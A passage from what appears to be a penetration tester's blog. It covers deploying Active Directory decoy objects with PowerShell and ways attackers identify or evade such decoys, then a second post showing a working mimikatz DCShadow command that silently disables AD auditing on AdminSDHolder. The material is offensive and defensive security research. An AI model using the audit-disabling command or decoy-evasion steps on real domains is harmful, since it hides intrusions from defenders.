<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> Deploy-ComputerDeception -DecoyComputerName comp1 -PropertyFlag TrustedForDelegation -Right ReadControl -Verbose
</textarea></pre>Above command uses an existing computer object and sets Unconstrained Delegation. Logging is triggered whenever DACL or all the attributes of the computer are read.<br />
<br />
We can also use <a href="https://www.dcshadow.com/">DCShadow</a> to modify a computer object which appears to be a DC. I briefly touched on this <a href="https://www.labofapenetrationtester.com/2018/04/dcshadow.html">here</a>. More on this particular topic some other day.<br />
<br />
<h4>Enumeration - Decoy Group Objects</h4>We can also deploy decoy Group objects. What properties of a group are interesting to an adversary?<br />
<ul><li>Interesting name (containing words like admins, administrators etc.) </li>
<li>Members of the group are also member of high privileged groups or have 'interesting' user attributes. </li>
<li>Membership of a high privilege group. </li>
</ul><br />
Groups provide interesting opportunities. We can make decoy users member of a decoy group thus creating 'layered' decoys. This way we get logs both when membership of the decoy group is listed and when attributes of the decoy user are listed. We will see soon how to use Logon restrictions to avoid mis-use of privileges of a user.<br />
<br />
So in the below command, we create a decoy user 'dnsmanager' whose password never expires with logging when an obscure property is read, create a group with name 'Forest Admins', make dnsmanager part of the forest admins group and add the forest admins group to the built-in dnsadmins group. Logging is triggered when membership of the group is read. We can use Deploy-GroupDeception for this:<br />
<pre><textarea cols="70" readonly="readonly" rows="7" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName dns -UserLastName manager -Password Pass@123 | Deploy-UserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
PS C:\> Create-DecoyGroup -GroupName 'Forest Admins' -Verbose | Deploy-GroupDeception -AddMembers dnsmanager -AddToGroup dnsadmins -GUID bc0ac240-79a9-11d0-9020-00c04fc2d4cf -Verbose
</textarea></pre><br />
<h4>Enumeration and Lateral Movement - Privileged Decoy User Objects</h4>We can also deploy high privilege user decoys to target both enumeration and lateral movement. We can create decoy users which have high privileges like membership of domain admins, rights to execute DCSync etc.<br />
<br />
Now, the risk with having decoy users with such high privileges is if such a user gets compromised, its privileges can be abused. To avoid that, we can use couple of protections:<br />
<ul><li>Set the Logon Workstation to a non-existent machine</li>
<li>Deny logon to the user. </li>
</ul>In both the above cases, AFAIK, user privileges cannot be used as the decoy user cannot logon to any box with any type of credential like password, hash etc.<br />
<br />
Armed with this knowledge, let's create high privilege user decoys using Deploy-PrivilegedUserDeception :<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Technique DomainAdminsMemebership -Protection DenyLogon -Right ReadControl -Verbose
</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOzIqM9APuIyzku_jUaHrmTHmJyiDTc5mGAbSU5nNTr3OMQekyRLhf7ixL9OHK_m-Y0xaZd7Kyt3dOpHGqxBL8MTnlzGIuRAvaq-dCZqT5VY1B2yKfvCqaRbD5dc1M6_zPUKbuKqtjL5Q/s1600/privilege_userdeception.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="395" data-original-width="1600" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOzIqM9APuIyzku_jUaHrmTHmJyiDTc5mGAbSU5nNTr3OMQekyRLhf7ixL9OHK_m-Y0xaZd7Kyt3dOpHGqxBL8MTnlzGIuRAvaq-dCZqT5VY1B2yKfvCqaRbD5dc1M6_zPUKbuKqtjL5Q/s400/privilege_userdeception.png" width="400" /></a></div>The above command creates a user called 'decda' who is a part of the Domain Admins but cannot logon to any machine. Any attempt to list DACL of the user or list all attributes results in a 4662 log.<br />
<br />
For the lateral movement part, we have used the DenyLogon protection. That means even if the user's password or hash or keys are compromised, it will not be possible to reuse those credentials. To get meaningful logs when credentials of such a user are used, we must enable the following Group Policy:<br />
Configuration|Windows Settings|Security Settings|Advanced Audit Policy Configuration|Audit Policies|Account Logon | Audit Kerberos Authentication Service | Failure<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1r17dbvHXozw25l7sxfRKw8Kv2wb5idA1e4UqFEDTFpVoRSTSBhWDFXGMtlHlRBppfTHUf_FT_zeiDetb275fsKv-skA6jClXeLDc4KaNXJKPpWEUGbQz7Q_QIh3bYzPugdOT2ITpK5g/s1600/GP_Kerberos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="615" data-original-width="1031" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1r17dbvHXozw25l7sxfRKw8Kv2wb5idA1e4UqFEDTFpVoRSTSBhWDFXGMtlHlRBppfTHUf_FT_zeiDetb275fsKv-skA6jClXeLDc4KaNXJKPpWEUGbQz7Q_QIh3bYzPugdOT2ITpK5g/s400/GP_Kerberos.png" width="400" /></a></div>This is how the failure looks like in GUI.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKjwMYmMzkE0aCnRE2fEjsRQTf2Ev5uVx_p2xccJKZCaS0hiGRTAQvRXfJyX6vnuQYwFl9t0odPhrzWcwx1K8CdLC75H6wrZDGg7V9ZkXBZ4H8dT-8qg7LRt2CrWJNwX-aZafVye0OEIo/s1600/Faliure.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="511" data-original-width="569" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKjwMYmMzkE0aCnRE2fEjsRQTf2Ev5uVx_p2xccJKZCaS0hiGRTAQvRXfJyX6vnuQYwFl9t0odPhrzWcwx1K8CdLC75H6wrZDGg7V9ZkXBZ4H8dT-8qg7LRt2CrWJNwX-aZafVye0OEIo/s320/Faliure.png" width="320" /></a></div>And a 4768 (Failure) is logged on the Domain Controller. In case of attacks like OverPass-The-Hash no such verbose error is returned.<br />
<br />
Another option is to set LogonWorkstation to a nonexistent machine. It always makes sense to use a name similar for the workstation that is similar to your actual machines. <br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception-Technique DCSyncRights -Protection LogonWorkStation revert-webserver1 -Right ReadControl -Verbose
</textarea></pre>Above command creates a decoy user call 'decda', provides it with DCSync permissions and sets the LogonWorkStation to a non-existent machine. If the users credentials are compromised and re-used the error would exactly be the same as in case of DenyLogon and a 4768 is logged.<br />
<br />
Both the protections can be used with a non-DA account as well. IMHO, this is better than leaving wrong passwords or hashes in memory (which is a well known technique).<br />
<br />
This technique can always be coupled with others. For example,when targeting lateral movement, one of the easier ways to let an adversary 'retrieve' credentials for a decoy user is to use the -PasswordInDescription option of Deploy-UserDeception. Then, we can make that user a privileged user and use one of the protections discussed above:<br />
<pre><textarea cols="70" readonly="readonly" rows="6" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName new -UserLastName da -Password Pass@123 | Deploy-UserDeception -PasswordInDescription 'The new password is Pass@123' -Verbose
PS C:\> Deploy-PrivilegedUserDeception -DecoySamAccountName newda -Technique DomainAdminsMemebership -Protection DenyLogon -Right ReadControl -Verbose
</textarea></pre></div><div style="text-align: justify;">The first command above creates a newuser called 'newda', sets the string 'The new password is Pass@123' as its description. The second command makes newda a member of the domain admins group, denies logon to the user and configures auditing whenever DACL or all attributes of newda are read.<br />
<br />
No special tools are required to get the password from description! Remember targeting 'go for the lowest hanging fruit' ;)<br />
<br />
While discussing users with privileges, there is another important aspect that must be discussed. It is about ACLs. A user which have interesting permissions over another user is always of interest to an attacker. (Side note: Make sure that you ACL auditing is a part of your security methodology - both for <a href="https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1">domain objects</a> and <a href="https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1">other</a> <a href="https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1">securables</a>).<br />
<br />
We can use Deploy-SlaveDeception to deploy decoy users where one of the users have FullControl/GenericAll rights over other user. This is interesting for an attacker and can be used to target both enumeration and lateral movement phase. <br />
<br />
To target enumeration, following can be used:<br />
<pre><textarea cols="70" readonly="readonly" rows="9" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName master -UserLastName user -Password Pass@123 | Deploy-UserDeception -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
PS C:\> Create-DecoyUser -UserFirstName slave -UserLastName user -Password Pass@123 | Deploy-UserDeception -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
PS C:\> Deploy-SlaveDeception -SlaveSamAccountName slaveuser -DecoySamAccountName masteruser -Verbose
</textarea></pre>The first and second command above, create users masteruser and slaveuser respectively and set auditing only when an obscure attribute is read. The third command provides masteruser GenericAll rights over slaveuser. Any adversary enumerating or scanning interesting ACLs in your domain will trigger 4662 for both the objects. <br />
<br />
<br />
To target lateral movement, we can use PasswordInDescription option for masteruser or leave its credentials using other popular methods without any protection. We are ready to risk masteruser to be compromised and used (Please carefully consider risks before doing that). If masteruser modifies DACL of slaveuser we get a 4662 log in addition to any other alerts that are triggered whenever a honeytoken/honeyuser is used: <br />
<pre><textarea cols="70" readonly="readonly" rows="10" style="background-color: #012456; color: white;"> PS C:\> Create-DecoyUser -UserFirstName master -UserLastName user -Password Pass@123
PS C:\> Create-DecoyUser -UserFirstName slave -UserLastName user -Password Pass@123
PS C:\> Deploy-SlaveDeception -SlaveSamAccountName slaveuser -DecoySamAccountName masteruser -Verbose
PS C:\> Deploy-UserDeception -DecoySamAccountName slaveuser -Principal masteruser -Right WriteDacl -Verbose
</textarea></pre>In the above command, a 4662 is logged only when masteruser changes DACL of slaveuser.<br />
<br />
<h4>Enumeration - Domain and Forest Trust objects</h4>Yet to be automated! There are many interesting possibilities though! For example, we can have a decoy forest trust (let's call it blue forest :P) where we can allow enumeration of users, computers and groups but deny access to any other resource. This can be achieved by setting up a forest trust with Selective Authentication where "Allowed to Authenticate" is set only on the DC but no other machine. This will allow an adversary to enumerate objects but they cannot access resources on other computers.<br />
<br />
<h4></h4><h4>Red Team Revenge - Identifying Deception</h4>So how do red teams identify which objects are actual and which are traps or decoys? As I mentioned in the beginning of the post, I have tested multiple Deception solutions over past months. There are multiple Enterprise solutions that use objects which can be identified by looking at their attributes. Some of such attributes:<br />
<br />
<ul><li><b>objectSID </b>- This object must always have DomainSID-RID format. Some enterprise solutions mess that up. If you find an object whose SID does not contain the domain SID. Make sure you investigate that object carefully. </li>
<li><b>lastLogon, lastlogontimestamp </b>- User decoys can be identified by looking at these attributes. If there is a user that too high privileged one who has never logged on (lastLogon set to 31/12/1600 which is before the 'zero' date for LargeInteger datetime), there are good chances that it is a decoy. </li>
<li><b>logonCount</b> - Although not as good as lastLogon, logonCount is also a good indicator.</li>
<li><b>whenCreated</b> - Coupled with lastLogon and logonCount, this becomes a good indicator. A user which is old but has never logged-on could be a decoy. You may like to notice that it may also be a dormant user, to be sure have a look at other attributes. </li>
<li><b>badPwdCount,badPasswordTime</b> - Ever seen a human user who will not fat-finger their password? A user with 0 Badpwdcount (and other bad password attributes) is a good indicator of a decoy. </li>
<li><b>Too many attributes </b>- Some enterprise solutions fill up ALL or way too many possible attributes for an object. This can also be easily spotted. </li>
</ul>The best way is to match an object with a well known 'good' object. For example, if you suspect that a computer object in a list of all computers in the domain is a decoy compare it with the properties of the domain controller or attributes of your own foothold machine. The actual dc is always listed in the logonserver environment variable. For user object, the built-in DA always has RID 500. Compare its attributes with a user object you suspect of being decoy.<br />
<br />
For multiple solutions which relied on not creating actual objects in the domain, using WMI to retrieve domain information shows correct objects and not the fake ones. <br />
<br />
<h4>Red Team Revenge - Avoiding Deception</h4>(Taken directly from my slides) Red Teams need to change their approach and their psychology of illusive superiority to avoid deception:<br />
<ul><li>Please stop going for the lowest hanging fruit. Enterprise networks are mess but if something looks to good to be true, investigate carefully!</li>
<li>Avoid automated enumeration tools unless you absolutely know what they are doing in the background. </li>
<li>I have been urging this in my talks (on ATA) and trainings - Avoid the urge to go for the DA privileges so that you can brag about it in the reports! Focus on goals of your operation. </li>
</ul><h4>Blue Teams - Avoiding identification</h4>If actual domain objects are used chances of identification are decreased. For example, a computer object which is not mapped to an actual computer has much higher chances of getting identified.<br />
<br />
For user decoys, as discussed earlier, having at least one logon session decreases the chances of identification. Let's test this one out.<br />
<br />
Let's have a look at a simple example. There is a well known deception identification script called <a href="https://github.com/JavelinNetworks/HoneypotBuster">HoneypotBuster</a>. Let's create a decoy DA and run the script:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvMS44QkQugfVMOAVjNkwSsIfDI9A_t_G6KNKrssnSnBOp0GuvYsNaAKB2Uehms5h4Z0vgr2Eggw8EOdyFu6uB9R17hvogm_TtbgZ31WtMZwgNKs9X3rFR9CwUp9jSNCfLoOT4-INZEjY/s1600/honeypotbuster-detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="1181" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvMS44QkQugfVMOAVjNkwSsIfDI9A_t_G6KNKrssnSnBOp0GuvYsNaAKB2Uehms5h4Z0vgr2Eggw8EOdyFu6uB9R17hvogm_TtbgZ31WtMZwgNKs9X3rFR9CwUp9jSNCfLoOT4-INZEjY/s400/honeypotbuster-detection.png" width="400" /></a></div>Our decoy DA was detected. Deploy-PrivilegedUserDeception has an option 'CreateLogon'. This parameter starts and stops calculator on the DC with the decoy DA user which populates the logon related properties of the user. To use this parameter, the LogonWorkstation protection must be set to the DC where the module is being executed. You can always change the behavior of the user later.<br />
<pre><textarea cols="70" readonly="readonly" rows="4" style="background-color: #012456; color: white;"> PS C:\> Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Technique DomainAdminsMemebership -Protection LogonWorkStation -LogonWorkStation revert-dc -CreateLogon -Verbose
</textarea></pre>The above command creates decda, makes it a member of the Domain Admins group, restricts logon to the DC and creates a logon session (which also creates a profile on the DC). Now, if we run Honeypot Buster<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCLZBjWGXSi-G0d50WYHEDs1M6ouu845G4go8Sd7rQjEF8nSiiIw_xh9XsQPGXbOZLTGhAiDsRtRJlhXRYKvOr5n04XE-U9v8v-w51Jxy0uE4wrF_2mZ_JelEZW3Icueb7DNYc_VA2_cE/s1600/honeypotbuster-evasion.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="511" data-original-width="1175" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCLZBjWGXSi-G0d50WYHEDs1M6ouu845G4go8Sd7rQjEF8nSiiIw_xh9XsQPGXbOZLTGhAiDsRtRJlhXRYKvOr5n04XE-U9v8v-w51Jxy0uE4wrF_2mZ_JelEZW3Icueb7DNYc_VA2_cE/s400/honeypotbuster-evasion.png" width="400" /></a></div>Sweet, the FakeRank or confidence of the tool is down to 50. Honeypot buster uses a ranking system for objects and if a user has a logonCount less than 6 there would always be some confidence of it being fake. If we make the logonCount to 6 for decda by starting a process with its credentials 6 times, it would not show up in this tool.<br />
<pre><textarea cols="70" readonly="readonly" rows="4" style="background-color: #012456; color: white;"> PS C:\> Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Technique DomainAdminsMemebership -Protection LogonWorkStation -LogonWorkStation revert-dc -CreateLogon -logonCount 6 -Verbose
</textarea></pre><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuC8HIDc_pjlV9Ft_lcoHF2RMWAfL69guAvzi_tbTQdEvPVc8O-V1YO0CAt2gZqXpG-HytY2ayrqvl5mGqtg2pXNYUBy3JZgW4viVfxucrXye5r3aACHKrxI5WVeqOZ2vlAAVTjuGTwhw/s1600/honeypotbuster-evasioncommand.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="260" data-original-width="1600" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuC8HIDc_pjlV9Ft_lcoHF2RMWAfL69guAvzi_tbTQdEvPVc8O-V1YO0CAt2gZqXpG-HytY2ayrqvl5mGqtg2pXNYUBy3JZgW4viVfxucrXye5r3aACHKrxI5WVeqOZ2vlAAVTjuGTwhw/s400/honeypotbuster-evasioncommand.png" width="400" /></a></div>Now if we run HoneypotBuster, decda is not detected! But that would be targeting this specific tool so let's not read much into this 'bypass'. <br />
<br />
<h4>Future Work and Community Involvement</h4>It would be great if you deploy the decoys in your domain environments and share the results with me. That way, even if you cannot contribute to the code, you will immensely help the project.<br />
<br />
OU objects are just around the corner and should not take much long to be included in the tool. I am also working on automating domain and forest trust decoys.I also have super ambitious plans of using virtualization to deploy decoys forests and computers in real time!<br />
<br />
That is all! Thank you very much for reading this rather long post. You can find slides and video of my talk at BruCON below!<br />
<br />
<iframe allowfullscreen="" center="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/910z0g2NGVm7AP" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<div style="margin-bottom: 5px;"><b> <a href="https://www.slideshare.net/nikhil_mittal/forging-trusts-for-deception-in-active-directory" target="_blank" title="Forging Trusts for Deception in Active Directory">Forging Trusts for Deception in Active Directory</a> </b> from <b><a href="https://www.slideshare.net/nikhil_mittal" target="_blank">Nikhil Mittal</a></b> </div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/EEceX5x2JY8/0.jpg" frameborder="0" height="485" src="https://www.youtube.com/embed/EEceX5x2JY8?feature=player_embedded" width="595"></iframe></div><br />
<br />
</div></div>Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-83142924192832290262018-05-03T22:17:00.001+05:302018-05-03T22:17:44.642+05:30Silently turn off Active Directory Auditing using DCShadow<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
My fascination with <a href="https://www.dcshadow.com/">DCShadow</a> continues, thanks to <a href="https://twitter.com/mysmartlogon">Vincent</a> and <a href="https://twitter.com/gentilkiwi">Benjamin</a>. I <a href="http://www.labofapenetrationtester.com/2018/04/dcshadow.html">blogged about it previously</a> as well.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
One very interesting thing which I recently discovered is the ability to DCShadow to modify System Access Control List or <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa374872(v=vs.85).aspx">SACL</a>. When we enable auditing on success or failure on an AD object, an entry (called <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa374868(v=vs.85).aspx">ACE - Access Control Entry</a>) is added to the SACL of that object. The permissions to an object are controlled by a DACL. For example, we modified DACL of AdminSDHolder in the previous post for persistence.<br />
<br /></div>
<div style="text-align: justify;">
<h4>
</h4>
<b>The Problem</b><br />
<br /></div>
<div style="text-align: justify;">
So, SACL controls auditing (logging) for an AD object. This means if we would like to avoid logs for our activities during an assessment , we should turn it off at the very first chance. Right? But is it that easy? <br />
<br />
Let's assume that full auditing is turned on the AdminSDHolder container and even a read operation is logged. This is what the SACL looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKlnwK_gpHBEogfCKokTd9EhQwOpkiGknYcgq7up3_xHqdn0qa_Osxk9bIWVgZHxXOPhYOx8w6yFA8k43lRrOU7JenUIPJ0C3J9trCBtzKCPpjmhyrnRDy-4lJK_mawMlP340_0atMmPw/s1600/AdminSDHolder-SACL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="518" data-original-width="775" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKlnwK_gpHBEogfCKokTd9EhQwOpkiGknYcgq7up3_xHqdn0qa_Osxk9bIWVgZHxXOPhYOx8w6yFA8k43lRrOU7JenUIPJ0C3J9trCBtzKCPpjmhyrnRDy-4lJK_mawMlP340_0atMmPw/s400/AdminSDHolder-SACL.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
The SACL governs logging of stuff. For example, with the above auditing settings, if we add Full Control rights for a user to the AdminSDHolder for persistence, an Event ID 4662 is logged: <br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgByVlpj6g09QkrxOyFm2aADBbgrQOZdmwvT4IvKIZA0eh2qroQcgcAxfk60ZDGJxjsdpb4E5xWFS8Ctv1vgXR6lySCIHy9hQ4YMyFqPeJWnOtPGyzI5uoINqhAe1vfMYVX9JR5f_pFLQ4/s1600/AdminSDHolder-4662.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="797" data-original-width="927" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgByVlpj6g09QkrxOyFm2aADBbgrQOZdmwvT4IvKIZA0eh2qroQcgcAxfk60ZDGJxjsdpb4E5xWFS8Ctv1vgXR6lySCIHy9hQ4YMyFqPeJWnOtPGyzI5uoINqhAe1vfMYVX9JR5f_pFLQ4/s400/AdminSDHolder-4662.png" width="400" /></a></div>
Now, we would like to turn auditing off for the AdminSDHolder object so that the above logs are avoided. Right? Right? ;)<br />
<br />
This can be done by removing the ACEs. But it is not as silent as we would like it to be. Removing ACEs results in more 4662s:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDQ5B4h6Ud4EZlMrP8uLgbbc5qU7LLh_7YaRK-894bZOVV0TUt_rHt5pLUPEWqpv8o9eBTFKu9BAisKTpc9KIfeKsOTZa-FjXJTmi5e__Er4Qq8Q8Fpsv84A9iJwaySwOnVwZeGMUxvNA/s1600/AdminSDHolder-More4662.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="866" data-original-width="1336" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDQ5B4h6Ud4EZlMrP8uLgbbc5qU7LLh_7YaRK-894bZOVV0TUt_rHt5pLUPEWqpv8o9eBTFKu9BAisKTpc9KIfeKsOTZa-FjXJTmi5e__Er4Qq8Q8Fpsv84A9iJwaySwOnVwZeGMUxvNA/s400/AdminSDHolder-More4662.png" width="400" /></a></div>
In case we were targeting a user object and remove auditing for it, a 4738 (User Account Management) in addition to multiple 4662s is logged.<br />
<br />
<b>The Solution</b><br />
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Now, how does DCShadow help? Try the below commands to set ACL of the AdminSDHolder to turn off the enhanced auditing:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:"CN=AdminSDHolder,CN=System,DC=offensiveps,DC=com" /attribute:ntSecurityDescriptor /value:"O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;LCRPLORC;;;RU)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-3270384115-3177237293-604223748-519)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)(OA;CI;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;RPWP;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;RPWP;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;RPWP;bf967a7f-0de6-11d0-a285-00aa003049e2;;CA)S:PAI(AU;CIFA;DT;;;WD)"
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZv2oPsuhziQHyWjqCJFsZVabsAITqNApVPKx7XtgJofQ3-429cg_F5rXrYEkJZQJJPYoqkYBU8Vk-AZ1lfnYwE_mAKC9kMpH6l1mGKp7fXd0ERNRrrhBfcjHlM9vXOsIDtKp1Yav5Y1w/s1600/mimikatz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="1600" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZv2oPsuhziQHyWjqCJFsZVabsAITqNApVPKx7XtgJofQ3-429cg_F5rXrYEkJZQJJPYoqkYBU8Vk-AZ1lfnYwE_mAKC9kMpH6l1mGKp7fXd0ERNRrrhBfcjHlM9vXOsIDtKp1Yav5Y1w/s400/mimikatz.png" width="400" /></a></div>
Bingo! No logs for turning off logging. Of course, I cannot show you no logs :P But we can see the new SACL:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYxsbFWbdlIH_Zko8qCfAfMKjCBv80EJJMf4L8bYdXIOLN1IzGhhXqYc4ja9QUgPxBjC7ENeJDt5psNwgQ-KwERkupTUtmyFmBp4wrmGvIi1ZOVXOX-9nVwPuHkbN2BpRrabhoqJ_Tz8k/s1600/AdminSDHolder-ModifiedSACL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="518" data-original-width="773" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYxsbFWbdlIH_Zko8qCfAfMKjCBv80EJJMf4L8bYdXIOLN1IzGhhXqYc4ja9QUgPxBjC7ENeJDt5psNwgQ-KwERkupTUtmyFmBp4wrmGvIi1ZOVXOX-9nVwPuHkbN2BpRrabhoqJ_Tz8k/s400/AdminSDHolder-ModifiedSACL.png" width="400" /></a></div>
Please note that we will still have logs related to DCShadow (4742 for the Computer registered as DC and 4662 for the domain object) but nothing else. </div>
<div style="text-align: justify;">
<br />
Note that the auditing entry in the above is <b>S:PAI(AU;CIFA;DT;;;WD)</b> <br />
<br />
What does that mean?<br />
S: - SACL<br />
PAI - Inheritance from higher up objects is blocked<br />
AU - System Audit<br />
CI - Container Inherit - The child objects inherit this.<br />
FA - Audit Failure<br />
DT - Delete Tree - No specific reason for using this other than chances of this being logged are low. <br />
WD - Everyone<br />
If you are not familiar with SDDL, go through these Technet posts to begin: <a href="https://blogs.technet.microsoft.com/askds/2008/04/18/the-security-descriptor-definition-language-of-love-part-1/">The Security Descriptor Definition Language of Love (Part 1)</a> and <a href="https://blogs.technet.microsoft.com/askds/2008/05/07/the-security-descriptor-definition-language-of-love-part-2/">Part 2</a>. <br />
<b><br />
</b> So why the above entry? No special reason. I thought, it would be better to leave an entry than removing all of it. If you want an ineffective SACL use just <b>S:PAI</b>. This is how it looks in the GUI:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj56x_nxy-hxdMmA3KTmv4m9C-mhhfv9Z0X-rOBfA8ie0PJHOA2us2M-HuVg05e5GpjCE6i1F7N8zpqannb897YTZuO0q0_f2NuX9yBQ-DCbC9A4yMEe2RavxkdrLyh10uIoIb8k_kWBws/s1600/AdminSDHolder-BlankSACL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="521" data-original-width="778" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj56x_nxy-hxdMmA3KTmv4m9C-mhhfv9Z0X-rOBfA8ie0PJHOA2us2M-HuVg05e5GpjCE6i1F7N8zpqannb897YTZuO0q0_f2NuX9yBQ-DCbC9A4yMEe2RavxkdrLyh10uIoIb8k_kWBws/s400/AdminSDHolder-BlankSACL.png" width="400" /></a></div>
You can use the below code for reading existing ACLs for an object. To easily get the desired ACE, set it up using GUI and then read the entries using the below code:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Import-Module ActiveDirectory
PS C:\> (Get-Acl 'AD:\CN=AdminSDHolder,CN=System,DC=offensiveps,DC=com' -Audit).SDDL
</textarea></pre>
<br />
<b>Further Research</b><br />
<br />
This is sweet but there are so many chances of further research on this. Like, there is still a single 4662 logged when mimkatz does "Attributes Checking" before we push the attributes. I read the source code of mimikatz and tried to avoid that read, but no success. <br />
<br />
Also, I cannot find a way to turn off default SACL for the domain object. In theory, this should be easily doable with similar commands we used above!<br />
<br />
Also, there are detections based on absence of logs as well. Unless we go for minimal modification to auditing we will still be detected.</div>
<div style="text-align: justify;">
<br />
Hope you liked the post :)<br />
<br />
<br /></div>
</div>
